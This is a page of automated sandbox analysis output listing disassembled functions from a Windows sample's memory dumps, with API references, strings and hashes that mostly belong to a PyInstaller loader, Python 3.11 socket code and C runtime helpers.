Associated: 00000001.00000002.3018928348.00007FFE14642000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe14630000_file.jbxd

Similarity

API ID: Buffer_Err_Release$String$From$Arg_ErrnoFormatParseSizeTuple_Unicode_inet_ntop
String ID: invalid length of packed IP address string$iy*:inet_ntop$unknown address family %d
API String ID: 418764794-2822559286
Opcode ID: 251d4f267bbc8b120124080416e823e53b3ce1559a1e7cbf42b99adeebe030d3
Instruction ID: d611df12fa389efa6d6234fb06cffd6055e9c96094dd33b5da7dfa82c450888f
Opcode Fuzzy Hash: 251d4f267bbc8b120124080416e823e53b3ce1559a1e7cbf42b99adeebe030d3
Instruction Fuzzy Hash: B031F021A18EC791EA508B22E8D46B923B1FF86B6DF405471D54E87B75DE3DE40DC780

Function 00007FFE1463736C Relevance: 24.1, APIs: 16, Instructions: 99COMMON

Download Yara Rule

APIs

PyList_New.PYTHON311 ref: 00007FFE14637389
GetIfTable2Ex.IPHLPAPI ref: 00007FFE146373AD
_Py_Dealloc.PYTHON311 ref: 00007FFE146373C2
PyErr_SetFromWindowsErr.PYTHON311 ref: 00007FFE146373CA
memcpy.VCRUNTIME140 ref: 00007FFE14637408
ConvertInterfaceLuidToNameW.IPHLPAPI ref: 00007FFE14637420
_Py_BuildValue_SizeT.PYTHON311 ref: 00007FFE14637443
PyList_Append.PYTHON311 ref: 00007FFE1463745B
_Py_Dealloc.PYTHON311 ref: 00007FFE14637475
FreeMibTable.IPHLPAPI ref: 00007FFE1463748E
_Py_Dealloc.PYTHON311 ref: 00007FFE146374CF
_Py_Dealloc.PYTHON311 ref: 00007FFE146374DE
FreeMibTable.IPHLPAPI ref: 00007FFE146374E9
_Py_Dealloc.PYTHON311 ref: 00007FFE146374FC
FreeMibTable.IPHLPAPI ref: 00007FFE14637507
PyErr_SetFromWindowsErr.PYTHON311 ref: 00007FFE1463750F

Memory Dump Source

Source File: 00000001.00000002.3018862329.00007FFE14631000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE14630000, based on PE: true

Associated: 00000001.00000002.3018842963.00007FFE14630000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018885111.00007FFE14638000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018906517.00007FFE14640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018928348.00007FFE14642000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe14630000_file.jbxd

Similarity

API ID: Dealloc$FreeTable$Err_FromList_Windows$AppendBuildConvertInterfaceLuidNameSizeTable2Value_memcpy
String ID:
API String ID: 1684791173-0
Opcode ID: af5f6e49e977fbb60a0688a72f8e008e180f3d1ae1b68ea70d7085a42f6f4076
Instruction ID: d83e4e6e4cf5d0bc2655bcba61167c440d2c316e9b78609ae5803cc742b2eba2
Opcode Fuzzy Hash: af5f6e49e977fbb60a0688a72f8e008e180f3d1ae1b68ea70d7085a42f6f4076
Instruction Fuzzy Hash: 5E413171A0CFC281EA649B22A9942B963A0FF8AB79F044075C94E47775DF3CE44DCB80

Function 00007FFE1A49D5B0 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 359COMMONLIBRARYCODE

Download Yara Rule

APIs

atol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFE1A498B34), ref: 00007FFE1A49DA16
DName::DName.LIBVCRUNTIME ref: 00007FFE1A49DA55
swprintf_s.PGOCR ref: 00007FFE1A49DA75
DName::DName.LIBVCRUNTIME ref: 00007FFE1A49DA85
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49DAD5

Strings

`template-type-parameter-, xrefs: 00007FFE1A49DAF6
lambda, xrefs: 00007FFE1A49D974
`generic-method-parameter-, xrefs: 00007FFE1A49DAA2
`generic-class-parameter-, xrefs: 00007FFE1A49DAE6
NULL, xrefs: 00007FFE1A49D67D
nullptr, xrefs: 00007FFE1A49D799

Memory Dump Source

Source File: 00000001.00000002.3019088524.00007FFE1A491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A490000, based on PE: true

Associated: 00000001.00000002.3019066108.00007FFE1A490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019117543.00007FFE1A4A1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019139929.00007FFE1A4A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019163495.00007FFE1A4A7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a490000_file.jbxd

Similarity

API ID: NameName::$Name::operator+atolswprintf_s
String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$lambda$nullptr
API String ID: 2331677841-2441609178
Opcode ID: 9797e925e62f8d7d60f646e305733279f9163504f8593401decf67f28b7cb35e
Instruction ID: 7e17d743b222922c7c9bdc72f2dcff32b43cf47136e25e4dc843c2aab51206fb
Opcode Fuzzy Hash: 9797e925e62f8d7d60f646e305733279f9163504f8593401decf67f28b7cb35e
Instruction Fuzzy Hash: EFF17022F08E5288FB34AB6685551BC27A1AF4DF64F4401F7C98F16AB5DE3CA979C340

Function 00007FF6399B15C0 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 137COMMON

Download Yara Rule

Strings

fopen, xrefs: 00007FF6399B161E
malloc, xrefs: 00007FF6399B16F6
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6399B168E
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6399B165B
fseek, xrefs: 00007FF6399B1695
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF6399B1775
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF6399B16EF
fwrite, xrefs: 00007FF6399B177C
fread, xrefs: 00007FF6399B178C
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6399B1785
Failed to create symbolic link %s!, xrefs: 00007FF6399B15E2
Failed to extract %s: failed to open target file!, xrefs: 00007FF6399B1617

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: Message
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2030045667-1550345328
Opcode ID: e3ef145b8e4e6e342cbff31276d98a709ae9a36c294bf9f028fee9e6f1cf9cb9
Instruction ID: 9e4c4bbbb682ef41f8687e9d242246bb55c0aa68d4ce875493744222d2cb0a94
Opcode Fuzzy Hash: e3ef145b8e4e6e342cbff31276d98a709ae9a36c294bf9f028fee9e6f1cf9cb9
Instruction Fuzzy Hash: D3518E62B0864392EA209F15A8901BA23A6FF44B94F4C4131EE1D877DFEF7CE554AB40

Function 00007FF6399B77D0 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 115COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6399B86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6399B3FA4,00000000,00007FF6399B1925), ref: 00007FF6399B86E9

ExpandEnvironmentStringsW.KERNEL32(?,00007FF6399B7C97,?,?,FFFFFFFF,00007FF6399B3834), ref: 00007FF6399B782C

Part of subcall function 00007FF6399B26C0: MessageBoxW.USER32 ref: 00007FF6399B2736

Strings

LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF6399B7840
CreateDirectory, xrefs: 00007FF6399B7974
LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF6399B789D
LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF6399B7803
\, xrefs: 00007FF6399B7861
LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF6399B796D
LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF6399B78D9
%.*s, xrefs: 00007FF6399B790C

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: c3532161b1b2b7c53ec0a0b3f79f5e94743c67efbab5da7731ebfcd00691680a
Instruction ID: 171f60cf0536e381e9dd6c6e71f96f09d87888ea8165b2a04250ab5cc8896131
Opcode Fuzzy Hash: c3532161b1b2b7c53ec0a0b3f79f5e94743c67efbab5da7731ebfcd00691680a
Instruction Fuzzy Hash: AB415011A2C64381FA50AF29DC916BA6273EF94784F4C5436D64EC6BDFEE2CE504AF40

Function 00007FFE14635F88 Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 95COMMON

Download Yara Rule

APIs

PyTuple_Size.PYTHON311 ref: 00007FFE14635FBE
PyErr_Format.PYTHON311 ref: 00007FFE14635FE7
_PyArg_ParseTuple_SizeT.PYTHON311 ref: 00007FFE1463600F
_PyArg_ParseTuple_SizeT.PYTHON311 ref: 00007FFE14636032
PySys_Audit.PYTHON311 ref: 00007FFE14636080
PyBuffer_Release.PYTHON311 ref: 00007FFE146360F4
PyLong_FromSsize_t.PYTHON311 ref: 00007FFE146360FF
PyBuffer_Release.PYTHON311 ref: 00007FFE1463610B

Strings

y*iO:sendto, xrefs: 00007FFE14636008
y*O:sendto, xrefs: 00007FFE1463602B
socket.sendto, xrefs: 00007FFE14636079
sendto, xrefs: 00007FFE14636045
sendto() takes 2 or 3 arguments (%zd given), xrefs: 00007FFE14635FDA

Memory Dump Source

Source File: 00000001.00000002.3018862329.00007FFE14631000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE14630000, based on PE: true

Associated: 00000001.00000002.3018842963.00007FFE14630000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018885111.00007FFE14638000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018906517.00007FFE14640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018928348.00007FFE14642000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe14630000_file.jbxd

Similarity

API ID: SizeTuple_$Arg_Buffer_ParseRelease$AuditErr_FormatFromLong_Ssize_tSys_
String ID: sendto$sendto() takes 2 or 3 arguments (%zd given)$socket.sendto$y*O:sendto$y*iO:sendto
API String ID: 3528750861-2448770124
Opcode ID: 3f37940c09982445fecb495795ba355f1bd1191ababdbabc58c2e70a8844f799
Instruction ID: 23d91679f4dc91a281968ef620f71be3784ce3a592024380f10876210f3d7446
Opcode Fuzzy Hash: 3f37940c09982445fecb495795ba355f1bd1191ababdbabc58c2e70a8844f799
Instruction Fuzzy Hash: 4A41EE76608F8685E710CF66E8902A977A4FB467ACF500176EA4D43B69DF3CD948C780

Function 00007FFDFF19A36C Relevance: 22.8, APIs: 15, Instructions: 336COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19A3BD
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19A499
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19A4E2
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19A4F3

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: Name::operator+
String ID:
API String ID: 2943138195-0
Opcode ID: cba6b1e9fb4b67cf24b22bddb9d4fa9a5090f12331f9dc9502d7e84557dfec21
Instruction ID: 2ce0aa2191fa5b544bd8af084ac1b7e99622189920931853c111d9fcd80850f1
Opcode Fuzzy Hash: cba6b1e9fb4b67cf24b22bddb9d4fa9a5090f12331f9dc9502d7e84557dfec21
Instruction Fuzzy Hash: D9F16A73F08A829AEB20DF64E4A05EC37B1AB4474CB444276DA6D57ADDDF38D619C380

Function 00007FFDFF15BAF0 Relevance: 22.6, APIs: 15, Instructions: 126COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFDFF15844C), ref: 00007FFDFF15BB3F
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF15844C), ref: 00007FFDFF15BB4D
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF15844C), ref: 00007FFDFF15BB61
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFDFF15844C), ref: 00007FFDFF15BB7B
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF15844C), ref: 00007FFDFF15BB8E
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF15844C), ref: 00007FFDFF15BBBC
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFDFF15844C), ref: 00007FFDFF15BBE2
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFDFF15844C), ref: 00007FFDFF15BC0B
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF15844C), ref: 00007FFDFF15BC19
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFDFF15844C), ref: 00007FFDFF15BC24
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFDFF15844C), ref: 00007FFDFF15BC46
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF15844C), ref: 00007FFDFF15BC54
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFDFF15844C), ref: 00007FFDFF15BC5F
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF15844C), ref: 00007FFDFF15BC9D

Part of subcall function 00007FFDFF162070: HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00007FFDFF15F368,?,?,?), ref: 00007FFDFF162085

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: ErrorLastValue$FreeHeap
String ID:
API String ID: 1971407770-0
Opcode ID: d45222136192229ddabd597837c423277c0d267546845e6dfec4e7550f8ae6c9
Instruction ID: 996a30def4f69737b0e710a9ac2f9f8df2f2fdb324081ed1bb3d66d79fab1ae9
Opcode Fuzzy Hash: d45222136192229ddabd597837c423277c0d267546845e6dfec4e7550f8ae6c9
Instruction Fuzzy Hash: 1B516022F09B8286FB64DF25A4649382360BF45B54F184734D97E877EDDF7CA5518304

Function 00007FFE14633EA0 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 89COMMON

Download Yara Rule

APIs

_Py_BuildValue_SizeT.PYTHON311 ref: 00007FFE14633EF2

Strings

OiII, xrefs: 00007FFE14633F96
iy#, xrefs: 00007FFE14633EEB
Unknown Bluetooth protocol, xrefs: 00007FFE14633F0A

Memory Dump Source

Source File: 00000001.00000002.3018862329.00007FFE14631000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE14630000, based on PE: true

Associated: 00000001.00000002.3018842963.00007FFE14630000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018885111.00007FFE14638000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018906517.00007FFE14640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018928348.00007FFE14642000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe14630000_file.jbxd

Similarity

API ID: BuildSizeValue_
String ID: OiII$Unknown Bluetooth protocol$iy#
API String ID: 1740464280-1931379703
Opcode ID: b5019a4988a9f915db0a6d89845ec5f5414b5f4d07377de8373c280a0b5a3016
Instruction ID: 6198e390f24d27ac630e2abed43c458cebdedda6e4debe9541423e849b494fe3
Opcode Fuzzy Hash: b5019a4988a9f915db0a6d89845ec5f5414b5f4d07377de8373c280a0b5a3016
Instruction Fuzzy Hash: B6313F21A0CEC281EA649B17E5C5079A2F0AF46BA8B4440B5EA0D47B75DF3CE89DC380

Function 00007FFE1A49AC40 Relevance: 19.9, APIs: 13, Instructions: 361COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49AC91
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49AD5A
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49ADA3
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49ADB4

Memory Dump Source

Source File: 00000001.00000002.3019088524.00007FFE1A491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A490000, based on PE: true

Associated: 00000001.00000002.3019066108.00007FFE1A490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019117543.00007FFE1A4A1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019139929.00007FFE1A4A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019163495.00007FFE1A4A7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a490000_file.jbxd

Similarity

API ID: Name::operator+
String ID:
API String ID: 2943138195-0
Opcode ID: b0c5aa40c95afe9820d08c2b3a0b3f0a0bd29e174dcc6565612d28bd398cd5cc
Instruction ID: 0dc9e0e491c62d3a44121681f69e8bf2139ddff831cc630c7c362dadbf8a1718
Opcode Fuzzy Hash: b0c5aa40c95afe9820d08c2b3a0b3f0a0bd29e174dcc6565612d28bd398cd5cc
Instruction Fuzzy Hash: 22F16E76B08A929EEB30DF66D4501FC37B1AB48B5CB4040B6DA4E57AA9DF38D536C340

Function 00007FFE14635BA4 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

_PyArg_ParseTupleAndKeywords_SizeT.PYTHON311 ref: 00007FFE14635BF3
PyBuffer_Release.PYTHON311 ref: 00007FFE14635C0C
PyErr_SetString.PYTHON311 ref: 00007FFE14635C23
PyBuffer_Release.PYTHON311 ref: 00007FFE14635C6C
_Py_Dealloc.PYTHON311 ref: 00007FFE14635C82
PyBuffer_Release.PYTHON311 ref: 00007FFE14635C96
PyBuffer_Release.PYTHON311 ref: 00007FFE14635CA8
_Py_BuildValue_SizeT.PYTHON311 ref: 00007FFE14635CBD

Strings

negative buffersize in recvfrom_into, xrefs: 00007FFE14635C12
nbytes is greater than the length of the buffer, xrefs: 00007FFE14635C9C
w*|ni:recvfrom_into, xrefs: 00007FFE14635BC2

Memory Dump Source

Source File: 00000001.00000002.3018862329.00007FFE14631000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE14630000, based on PE: true

Associated: 00000001.00000002.3018842963.00007FFE14630000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018885111.00007FFE14638000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018906517.00007FFE14640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018928348.00007FFE14642000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe14630000_file.jbxd

Similarity

API ID: Buffer_Release$Size$Arg_BuildDeallocErr_Keywords_ParseStringTupleValue_
String ID: nbytes is greater than the length of the buffer$negative buffersize in recvfrom_into$w*|ni:recvfrom_into
API String ID: 252658603-4033050226
Opcode ID: 7770c21abc1e98952bb05a00ddef4d54aceea9117a956bb039f88ab0940e4950
Instruction ID: 71372f932f120e61649a364bd1b88c8dd3b39955835a1fd940f033ec1c067512
Opcode Fuzzy Hash: 7770c21abc1e98952bb05a00ddef4d54aceea9117a956bb039f88ab0940e4950
Instruction Fuzzy Hash: 6331FD72A09F8681EB108B52E8941B973B0FB8ABACF500576D98D47B65DF3DD54CC780

Function 00007FFE1463706C Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 44threadnetworkCOMMON

Download Yara Rule

APIs

_PyArg_ParseTuple_SizeT.PYTHON311 ref: 00007FFE1463708D
PySys_Audit.PYTHON311 ref: 00007FFE146370B3
PyEval_SaveThread.PYTHON311 ref: 00007FFE146370C7
getservbyname.WS2_32 ref: 00007FFE146370DA
PyEval_RestoreThread.PYTHON311 ref: 00007FFE146370E6
PyErr_SetString.PYTHON311 ref: 00007FFE14637107
htons.WS2_32 ref: 00007FFE1463711D
PyLong_FromLong.PYTHON311 ref: 00007FFE14637126

Strings

s|s:getservbyname, xrefs: 00007FFE1463707C
socket.getservbyname, xrefs: 00007FFE146370AC
service/proto not found, xrefs: 00007FFE146370FD

Memory Dump Source

Source File: 00000001.00000002.3018862329.00007FFE14631000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE14630000, based on PE: true

Associated: 00000001.00000002.3018842963.00007FFE14630000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018885111.00007FFE14638000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018906517.00007FFE14640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018928348.00007FFE14642000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe14630000_file.jbxd

Similarity

API ID: Eval_Thread$Arg_AuditErr_FromLongLong_ParseRestoreSaveSizeStringSys_Tuple_getservbynamehtons
String ID: service/proto not found$socket.getservbyname$s|s:getservbyname
API String ID: 1135235387-1257235949
Opcode ID: 6bff8297cce08953e3afc7c75cc212c91fc154ff3befdf006637c4b14c249c61
Instruction ID: 8c3d7cf34e844aba4cac098378259d91893ef0c4fa9d41089d82399490ef6eb8
Opcode Fuzzy Hash: 6bff8297cce08953e3afc7c75cc212c91fc154ff3befdf006637c4b14c249c61
Instruction Fuzzy Hash: B211F126608E8381EA108B13F8842B963B0FF46BA9F5450B1DA4E47778DF3CD84DC780

Function 00007FFDFF160B9C Relevance: 18.1, APIs: 12, Instructions: 139COMMON

Download Yara Rule

APIs

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFDFF160CA3
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF160CB1
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFDFF160CBC
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFDFF160D0B
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF160D19
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFDFF160D21
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFDFF160D27
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF160D35
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFDFF160D3D
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFDFF160D43
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF160D51
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFDFF160D59

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: ErrorLast$Value
String ID:
API String ID: 1883355122-0
Opcode ID: 35f196c39e9f57e60ee2d9b41a38a6ef83498147af536d1246b52d3bd9bc498d
Instruction ID: 4274f6c783a9202fd4f87c14bc302afc45ed392aa9f9dd826e3acf68f552ec83
Opcode Fuzzy Hash: 35f196c39e9f57e60ee2d9b41a38a6ef83498147af536d1246b52d3bd9bc498d
Instruction Fuzzy Hash: C551F726F09B8686EB549F65E470A782360BF84F84F544635DA3E833EADF2CE845C340

Function 00007FFDFF1691E0 Relevance: 18.1, APIs: 12, Instructions: 83COMMON

Download Yara Rule

APIs

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,00000000,00007FFDFF1690F4,?,?,00007FFDFF168CAC), ref: 00007FFDFF1691EF
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,?,?,00000000,00007FFDFF1690F4,?,?,00007FFDFF168CAC), ref: 00007FFDFF1691FD
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,?,?,00000000,00007FFDFF1690F4,?,?,00007FFDFF168CAC), ref: 00007FFDFF169211
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,00000000,00007FFDFF1690F4,?,?,00007FFDFF168CAC), ref: 00007FFDFF16922B
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,?,?,00000000,00007FFDFF1690F4,?,?,00007FFDFF168CAC), ref: 00007FFDFF16923E
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,?,?,00000000,00007FFDFF1690F4,?,?,00007FFDFF168CAC), ref: 00007FFDFF16926C
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,00000000,00007FFDFF1690F4,?,?,00007FFDFF168CAC), ref: 00007FFDFF169292
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,00000000,00007FFDFF1690F4,?,?,00007FFDFF168CAC), ref: 00007FFDFF1692A9
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,?,?,00000000,00007FFDFF1690F4,?,?,00007FFDFF168CAC), ref: 00007FFDFF1692B7
